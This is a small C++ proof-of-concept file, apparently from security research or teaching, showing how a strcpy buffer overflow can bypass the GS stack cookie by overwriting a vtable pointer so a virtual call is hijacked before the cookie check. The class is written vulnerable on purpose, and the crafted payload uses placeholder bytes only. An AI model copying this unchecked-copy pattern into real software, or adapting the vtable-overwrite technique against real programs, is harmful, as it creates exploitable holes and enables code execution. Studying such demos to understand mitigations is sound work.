#include <string.h>

// The gs3 function is vulnerable to a buffer overflow, but its return address
// is protected by the stack cookie. To exploit the overflow, we will overwrite
// the foo object in stack frame of the main function. The first element of the
// object is a pointer to the vtable which is used in the call to the virtual
// function bar. Modifying the vtable pointer allows us to redirect this call
// and execute our shellcode before the GS cookie check at the end of gs3()
//
// Stack right before the overflow:
//
//   esp    buffer
//   esp+8  gs cookie
//   esp+C  return address of gs3
//   esp+10 argument to gs3
//   esp+14 foo object
//   esp+18 return address of main
//   esp+1C arguments to main
//
// Virtual call diassembly:
//
//   mov  edx, [esi]    ; esi is the 'this' pointer, edx is the vtable pointer
//   mov  eax, [edx]    ; eax is the first function pointer from the vtable
//   mov  ecx, esi      ; 'this' is passed in ecx to the virtual function
//   call eax           ; call the virtual function

class Foo {

public:

    void __declspec(noinline) gs3(char* src)
    {
        char buf[8];

        strcpy(buf, src);

        bar();      // virtual function call
    }

    virtual void __declspec(noinline) bar()
    {
    }
};

int main()
{
    Foo foo;

    foo.gs3(
        "AAAAAAAA"      // buffer
        "AAAA"          // gs cookie
        "AAAA"          // return address of gs3
        "AAAA"          // argument to gs3
        "BBBB");        // vtable pointer in the foo object
}
